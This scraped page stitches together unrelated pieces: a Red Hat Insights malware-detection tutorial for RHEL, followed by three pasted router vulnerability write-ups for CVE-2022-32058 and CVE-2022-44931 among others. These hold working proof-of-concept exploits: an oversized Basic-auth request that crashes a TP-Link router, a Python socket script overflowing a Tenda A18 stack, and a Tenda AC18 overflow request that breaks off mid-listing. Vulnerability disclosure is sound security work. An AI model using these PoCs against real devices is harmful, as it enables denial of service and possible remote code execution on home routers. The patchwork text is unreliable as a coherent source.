Did you know that <a href="https://www.redhat.com/en/technologies/management/insights">Red Hat Insights</a> for <a href="https://www.redhat.com/en/technologies/linux-platforms/enterprise-linux">Red Hat Enterprise Linux</a> (RHEL) can be used to help detect the presence of malware? This makes it more likely that you'll know when a RHEL system has sustained a malware attack. The effectivenes

Did you know that **Red Hat Insights** for **Red Hat Enterprise Linux** (RHEL) can be used to help detect the presence of malware? This makes it more likely that you'll know when a RHEL system has sustained a malware attack. The effectiveness of Insights for this purpose is enhanced by threat intelligence subscriptions from IBM X-Force, in collaboration with Red Hat.

The Insights malware-detection service is a monitoring and assessment tool that scans RHEL systems for the presence of known malware. The system incorporates YARA pattern-matching software and detection signatures.

Insights is a cloud-based service that can be accessed from the Red Hat customer portal. This means there is no maintenance to be done on the user's end. Simply integrate it with Insights clients, which are available for almost all subscriptions to RHEL, Red Hat OpenShift and Red Hat Ansible Automation Platform.

Insights proactively and continuously analyzes platforms and applications to help predict risks, recommend actions, track licenses and manage costs. This helps enterprises better manage their on-premise and hybrid cloud environments.

Sound good? Then I'll show you how easy it is to integrate your Red Hat environment, issue the first report on malware detection, and other useful information for smooth-running Red Hat systems.

**Prerequisites**

Since this is a modern solution, we will need a supported operating system.

*   The operating system version must be RHEL8 or RHEL9
*   The administrator must have administrative or sudo access to the system
*   The Insights client package must be installed
*   The environment must be registered in Insights for Red Hat Enterprise Linux
*   The system must be able to access the Red Hat Cloud Console via direct internet access or HTTP proxy
*   User permission on malware-detection groups, roles and members in User Access

**Laboratory**

We will work with an RHEL 8 system to better exemplify the reports generated. We will intentionally adjust some items to provide a better analysis by Insights.

The fully qualified domain name (FQDN) will be:

*   **Host**: rhel8-yara-testing.rhbrlabs.com

**Host**

For the host, we’ll use RHEL 8.5, with no updates and Security-Enhanced Linux (SELinux) disabled. This insecure setup is necessary to generate more inputs to Insights.

*   A regular update routine in a real production environment is important. Likewise SELinux should operate in Enforcing mode to increase the reliability of a production environment.

Before proceeding with the YARA installation, we need to perform three important basic tasks:

*   Take care that the environment clock is always synchronized
*   Set the timezone correctly
*   Perform the system subscription

**Basic tasks**

Disable SELinux (again, in real production environments, we recommend using SELinux in Enforcing mode), and perform the basic tasks:

\# sed -i s/'\\=enforcing'/'\\=disabled'/g /etc/selinux/config
# timedatectl set-timezone America/Sao\_Paulo
# hostnamectl set-hostname rhel8-yara-testing.rhbrlabs.com

You may want to logout/login before performing the next steps:

\# subscription-manager register --auto-attach
# subscription-manager status
# subscription-manager repos
# dnf -y install chrony
# systemctl enable --now chronyd.service
# chronyc sources
# reboot

Don't update the system yet!

**Software installation**

Now the YARA and Insights packages:

\# dnf -y install yara insights-client

Only these packages are needed for the magic to happen. Very handy.

**Using Insights**

Let's move on to performing the basic tasks below:

*   Connection test
*   Registering the system in Insights
*   Scanning the system for malware

**Connection test**

Test the connection to Insights for RHEL.

\# insights-client --test-connection

Running Connection Tests...
=== Begin Upload URL Connection Test ===
Testing: https://cert-api.access.redhat.com/r/insights/uploads/
POST https://cert-api.access.redhat.com/r/insights/uploads/
HTTP Status: 200 OK
HTTP Response Text: {"request\_id":"e7d200e80a","upload":{"account\_number":"000000X","org\_id":"1111111Y"}}
Successfully connected to: https://cert-api.access.redhat.com/r/insights/uploads/
=== End Upload URL Connection Test: SUCCESS ===

=== Begin API URL Connection Test ===
Testing: https://cert-api.access.redhat.com/r/insights/
GET https://cert-api.access.redhat.com/r/insights/
HTTP Status: 200 OK
HTTP Response Text: lub-dub
Successfully connected to: https://cert-api.access.redhat.com/r/insights/
=== End API URL Connection Test: SUCCESS ===

Connectivity tests completed successfully
See /var/log/insights-client/insights-client.log for more details.

In the example above, we can see that the system was able to connect to the Insights cloud services.

**Registering the system in Insights**

Register the system with Insights.

\# insights-client --register

Successfully registered host rhel8-yara-testing.rhbrlabs.com
Automatic scheduling for Insights has been enabled.
Starting to collect Insights data for rhel8-yara-testing.rhbrlabs.com
Uploading Insights data.
Successfully uploaded report from rhel8-yara-testing.rhbrlabs.com to account 000000X.
View the Red Hat Insights console at https://console.redhat.com/insights/

System successfully registered in Insights. Now move on to the next step.

**Malware scanning**

Run the Insights client malware-detection collector. This operation will take a while to finish.

\# insights-client --collector malware-detection

Starting to collect Insights data for rhel8-yara-testing.rhbrlabs.com
Writing the malware-detection app default configuration to /etc/insights-client/malware-detection-config.yml

Performing a test scan of /etc/insights-client/malware-detection-config.yml and the current process (PID 5638) to verify the malware-detection app is installed and scanning correctly ...

Starting filesystem scan ...
Scanning specified files in /etc ...
Matched rule TEST\_RedHatInsightsMalwareDetection in file /etc/insights-client/malware-detection-config.yml
Scan time for /etc: 0 seconds
Filesystem scan time: 00:00:00
Starting processes scan ...
Scanning process 5638 ...
Matched rule TEST\_RedHatInsightsMalwareDetection in process 5638
Scan time for process 5638: 0 seconds
Processes scan time: 00:00:00
Found 2 rule matches.

Red Hat Insights malware-detection app test scan complete.
Test scan results are not recorded in the Insights UI (https://console.redhat.com/insights/malware)
To perform proper scans, please set test\_scan: false in /etc/insights-client/malware-detection-config.yml

Uploading Insights data.
Successfully uploaded report for rhel8-yara-testing.rhbrlabs.com.

A rule related to "**TEST\_RedHatInsightsMalwareDetection**" will be matched, but this is intentional and nothing to worry about, as the operation was performed in "**test**" mode. Later on we will see how to deactivate the test mode.

The results of the initial scan may not yet appear in the detection service's Web UI, but Insights will be fully operational and update the Web UI with some information.

Go to the Insights console and check the **Insights findings** for your system.

_Insights advisory_

_Vulnerabilities found_

_Pending patches_

The collector takes the following actions during this first run:

*   Creates a malware detection configuration testing file at **/etc/insights-client/malware-detection-config.yml**.
*   Performs a test scan and uploads the results

Next, we will see how to customize the generated YAML configuration to enable other functions, as this initial scan only does simpler checks.

Edit **/etc/insights-client/malware-detection-config.yml** and set the **test\_scan** option to **false**.

\# sed -i s/'test\_scan:\\ true'/'test\_scan:\\ false'/g /etc/insights-client/malware-detection-config.yml

There are other YAML configuration options you can explore, but for now, we'll just stick with what we have.

Now perform a full filesystem scan, by re-running the Insights client collector:

\# insights-client --collector malware-detection
Starting to collect Insights data for rhel8-yara-testing.rhbrlabs.com
Skipping missing filesystem\_scan\_exclude item: '/cgroup'
Skipping missing filesystem\_scan\_exclude item: '/selinux'
Skipping missing filesystem\_scan\_exclude item: '/net'
Excluding specified filesystem items: \['/proc', '/sys', '/mnt', '/media', '/dev'\]
Starting filesystem scan ...
Scanning files in /.autorelabel ...
Scan time for /.autorelabel: 0 seconds
Scanning files in /.bash\_history ...
Scan time for /.bash\_history: 0 seconds
Scanning files in /boot ...
Scan time for /boot: 0 seconds
Scanning files in /etc ...
Scan time for /etc: 0 seconds
Scanning files in /home ...
Scan time for /home: 0 seconds
Scanning files in /opt ...
Scan time for /opt: 0 seconds
Scanning files in /root ...
Scan time for /root: 0 seconds
Scanning files in /run ...
Scan time for /run: 0 seconds
Scanning files in /srv ...
Scan time for /srv: 0 seconds
Scanning specified files in /tmp ...
Scan time for /tmp: 0 seconds
Scanning files in /usr ...
Scan time for /usr: 65 seconds
Scanning specified files in /var ...
Scan time for /var: 4 seconds
Filesystem scan time: 00:01:11
No rule matches found.
Uploading Insights data.
Successfully uploaded report for rhel8-yara-testing.rhbrlabs.com.

**Logs**

Check the Insights and malware detection logs at: **/var/log/insights-client/insights-client.log**

_Insights and malware detection logs_

**View results of malware-detection system scans on the Hybrid Cloud Console**

Prerequisites:

*   You must be logged into the Hybrid Cloud Console (https://console.redhat.com)
*   You are a member of a Hybrid Cloud Console User Access group with the Malware detection administrator or Malware detection viewer role.

NOTE: An Organization Administrator must create malware-detection groups in **Red Hat Hybrid Cloud Console > User Access > Groups** and add the necessary **malware-detection roles and members** (registered users on the account).

Navigate to **Red Hat Enterprise Linux > Malware > Systems**.

In the Insights dashboard in the customer portal, we can see the malware scan results as well as other health and safety recommendations for the environment:

_Malware scan results_

**IMPORTANT**: There is no "default-group" role for malware-detection service users. For users to view data or control settings in the malware-detection service, they must be members of one or more User Access groups with one of the following roles:

*   Malware detection viewer
*   Malware detection administrator

In the malware-detection service UI, User Access-authorized administrators and viewers can:

*   See the list of signatures against which their RHEL systems are scanned
*   See aggregate results for all RHEL systems with malware-detection enabled in the Insights client
*   See results for individual systems
*   Know when a system shows evidence of the presence of malware

These features give security threat assessors and IT incident-response teams valuable information to help prepare a response.

**Useful links**

*   Red Hat Insights
*   Product Documentation for Red Hat Insights 2022
*   Get started using the Insights for RHEL malware-detection service

How to use Red Hat Insights malware detection service

An infinite loop in the function httpRpmPass of TP-Link TL-WR741N/TL-WR742N V1/V2/V3_130415 allows attackers to cause a Denial of Service (DoS) via a crafted packet.

we can get firmware in TL-WR741N \_TL-WR742N V1/V2/V3\_130415标准版 - TP-LINK 服务支持

Recurring vulnerabilities and POC

haven’t logged in

this is poc

GET http://192.168.1.1/

Host: 192.168.1.1

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:73.0) Gecko/20100101 Firefox/73.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0, no-cache

Authorization: Basic MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==

Pragma: no-cache

send it and cause dos

browser cant load anything

Vulnerability details：

file is in /usr/bin/http and the vulnerable function is “httpRpmPass”

do not check the length of input data

we can see that the attacker can send a huge package to cause a dos.

CVE-2022-32058: CVE/TP-Link TL-WR741NTL-WR742N .md at main · whiter6666/CVE

Tenda A18 v15.13.07.09 was discovered to contain a stack overflow via the security_5g parameter at /goform/WifiBasicSet.

Permalink

Cannot retrieve contributors at this time

**Tenda A18 V15.13.07.09 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address: https://www.tenda.com.cn/download/detail-2760.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiBasicSet, the user can control security\_5g, which will be copied to param\_5g by the strcpy function. It is worth noting that there is no size check, which leads to a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'security\_5g=' + p1

p3 \= b"POST /goform/WifiBasicSet" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44931: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda AC18 router v15.03.05.19 and v15.03.05.05 was discovered to contain a stack overflow via the urls parameter at /goform/saveParentControlInfo.

**Tenda AC18 Unauthorized stack overflow vulnerability******1\. Affected version:****

V15.03.05.05\_multi and V15.03.05.19\_multi

****2\. Firmware download address****

https://www.tenda.com.cn/download/detail-2683.html

****3\. Vulnerability details****

In function saveParentControlInfo, the content obtained by the program from the urls parameter is passed to V24, and then the V24 is directly copied into the V17 + 80 stack through the strcpy function. There is no size check, so there is a stack overflow vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

****4\. Recurring vulnerabilities and POC****

In order to reproduce the vulnerability, the following steps can be followed:

1.Use the fat simulation firmware V15.03.05.19\_multi

2.Attack with the following overflow POC attacks

    POST /goform/saveParentControlInfo HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 143
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/parental_control.html?random=0.524930998878748&
    Cookie: password=0d403f6ad9aea37a98da9255140dbf6ecmucvb
    
